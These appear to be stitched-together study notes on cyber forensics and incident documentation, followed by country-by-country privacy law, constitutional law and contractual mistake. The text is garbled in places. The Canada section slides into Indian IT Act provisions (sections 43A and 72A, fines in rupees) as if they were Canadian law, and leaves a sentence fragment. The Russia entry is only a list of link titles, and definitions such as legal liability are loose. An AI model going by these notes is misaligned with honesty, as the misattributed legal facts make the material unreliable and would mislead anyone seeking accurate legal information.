The primary scope of forensic analysis is to identify unauthorized or anomalous indicators that exist (past or present), how they were deployed, and what capabilities they might have had on the system. After identifying whether a successful compromise or malicious software exists, Secure State's primary focus is directed at determining the applicable next steps relating to regulatory or legal compliance, as well as business impact and risk. Applicable next steps would involve additional forensic acquisition and documentation, collecting and identifying the initial intent of the compromise, remediation, and determining whether any private, regulatory or sensitive data was captured or modified.
Documenting and Recording Process
All details, facts and processes will be documented as soon as the Response Team begins analysis of a potential incident or forensic investigation. Secure State will incorporate appropriate media for logging the incident process, such as host records and tagging and labeling systems. Every step taken from the time the incident was detected and recorded to its resolution will be documented, time-stamped, reviewed, and signed by the incident handler. Since documentation is an ongoing process throughout the examination, it is vital to be complete, accurate, and comprehensive during the reporting process. Secure State will safeguard data related to incidents, since it will contain sensitive system or personnel information, data on exploited vulnerabilities, or information that may be needed by law enforcement. To reduce the risk of sensitive information being disclosed, Secure State ensures that access to incident data is restricted and that the data is properly stored. In accordance with applicable policies, rules, regulations, or other governing requirements, Secure State is responsible for the secure and timely delivery of its investigation reports and all other reports required by the Incident Response Policies.
Accuracy
Many forensic techniques were developed in crime labs to aid investigators, and research into their limits or scientific validity was never a priority. Except for DNA, no method has been shown to be able to consistently and accurately link a piece of evidence to an individual or single source.
Forensic analysts
Forensic analysts work within the justice system, providing key evidence to criminal investigations. Within the field of forensics there are six general areas of study: crime laboratory analyst, medical examiner, crime scene examiner, forensic engineer, technical assistance and academic assistance. The main job of all forensic analysts is to help investigators solve crimes, and in particular to help the investigator identify the criminal.
Responsibilities of a forensic analyst
The responsibilities of a forensic analyst include classifying and performing tests on specific pieces of evidence lifted from a crime scene. This evidence may include hair, fibers, tissue and firearms.
UNIT - 9 Privacy and Cyber Forensics
Privacy and Cyber Forensics 8/17/2015
Privacy law
Privacy law refers to the laws that regulate personal information about individuals, which can be collected by governments and other public as well as private organizations, and the storage and use of that information.
Classification of privacy law
Privacy law is classified into two types: general privacy laws and specific privacy laws.
General privacy laws
General privacy laws have an overall bearing on the personal information of individuals and affect the policies that govern many different areas of information.
Specific privacy laws
These laws are designed to regulate specific types of information. Some examples include health privacy laws, financial privacy laws, online privacy laws, communication privacy laws and information privacy laws.
Privacy laws in Australia
The current state of privacy law in Australia includes federal and state information privacy legislation, some sector-specific privacy legislation at state level, regulation of the media and some criminal sanctions. The Australian Law Reform Commission has recommended the enactment of a statutory cause of action for invasion of privacy.
Privacy laws in Brazil
A Brazilian citizen's privacy is protected by the country's constitution, which states: "The intimacy, private life, honor and image of the people are inviolable, with assured right to indemnity for material or moral damage resulting from its violation."
Privacy laws in Canada
In Canada, the federal Personal Information Protection and Electronic Documents Act (PIPEDA) governs the collection, use and disclosure of personal information in connection with commercial activities, and personal information about employees of federal works, undertakings and businesses. It generally does not apply to non-commercial organizations or provincial governments. Personal information collected, used and disclosed by the federal government. Previously, the Information Technology (Amendment) Act added the following two sections relating to privacy: Section 43A, which deals with the implementation of reasonable security practices for sensitive personal information and provides for compensation of the person affected by wrongful loss or wrongful gain; and Section 72A, which provides for imprisonment for a period of up to 3 years or a fine of up to Rs. 5,00,000 for a person.
Privacy laws in Mexico
On July 5, 2010, Mexico passed a new privacy package focused on the treatment of personal data by private entities. The key elements included: a requirement that all private entities who gather personal data publish their privacy policy in accordance with the law; fines of up to $16,000,000 MXN for violations of the law; and prison penalties for serious violations.
Privacy laws in New Zealand
In New Zealand, the Privacy Act 1993 sets out principles in relation to the collection, use, disclosure and security of, and access to, personal information. New Zealand common law has also seen the introduction of a tort covering invasion of personal privacy. Complaints about privacy are considered by the Privacy Commissioner.
Privacy laws in the Republic of China (Taiwan)
The Computer Processed Personal Information Protection Act was enacted in 1995 to protect personal information processed by computers. Its general provisions specify the purpose of the law, define crucial terms and prohibit individuals from waiving certain rights.
Privacy laws in Russia
Data protection principles and legislation in the Russian Federation (in English).
Online database of the Russian laws (in Russian).
Federal Service for supervision in the sphere of communications, information technology and mass media (in Russian).
Privacy laws in the United Kingdom
As a party to the European Convention on Human Rights, the United Kingdom adheres to Article 8 ECHR, which guarantees a "right to respect for private and family life" against state parties, subject to restrictions prescribed by law and necessary in a democratic society in pursuit of a legitimate aim.
Privacy laws in the United States
The right to privacy is not explicitly stated anywhere in the Bill of Rights. The idea of a right to privacy was first addressed in a legal context in the United States when Louis Brandeis (later a Supreme Court justice) and another young lawyer, Samuel D. Warren, published an article called "The Right to Privacy" in the Harvard Law Review in 1890, arguing that the U.S. Constitution and common law allowed for the deduction of a general "right to privacy".
Privacy laws in Greece
Taking a picture of a person in a public space requires consent. Taking a photo or video of someone, or drawing them in a painting, constitutes an illegal act in itself according to Article 57 of the Greek Civil Code. The law assumes that consent has been given silently if the depicted person has been paid for the photography session. Law 2472/1997 also applies in many circumstances, even to photography. Greece also requires photographers to obtain a government permit before photographing people participating in political protests in public places.
Constitutional law
Constitutional law is the body of law which defines the relationship of different entities within a State, namely, the executive, the legislature, and the judiciary.
Human rights
Human rights or civil liberties form a crucial part of a country's constitution and govern the rights of the individual against the state. Most jurisdictions, like the United States and France, have a codified constitution with a bill of rights.
Legislative procedure
Another main function of a constitution may be to describe the procedure by which parliaments may legislate. For instance, special majorities may be required to alter the constitution.
In bicameral legislatures
There may be a process laid out for second or third readings of bills before a new law can enter into force. Alternatively, there may be requirements for the maximum term that a government can keep power before holding an election.
Study of constitutional law
Constitutional law is a major focus of legal studies and research. For example, most law students in the United States are required to take a class in Constitutional Law during their first year, and several law journals are devoted to the discussion of constitutional issues.
The Rule of Law
Dicey identified three essential elements of the rule of law in the British Constitution: absence of arbitrary power; equality before the law; and that the Constitution is a result of the ordinary law of the land.
Legal liability
Legal liability is the legally bound obligation to pay debts. It operates under the rule of law.
Mistake of law
When a party enters into a contract without knowledge of the law, the contract is affected by such a mistake but is not void. A contract is not voidable merely because it was caused by a mistake of law; the reason is that ignorance of the law is no excuse at all.
Mistake of fact
Where both parties entering into an agreement are under a mistake as to a matter of fact essential to the agreement, the agreement is void.
Common mistake
A common mistake occurs where both parties hold the same mistaken belief about the facts.
Mistake classification
Mistakes are classified into two types: mistake of law, when a party enters into a contract without knowledge of the law; and mistake of fact, where both parties entering into an agreement are mistaken about an essential fact.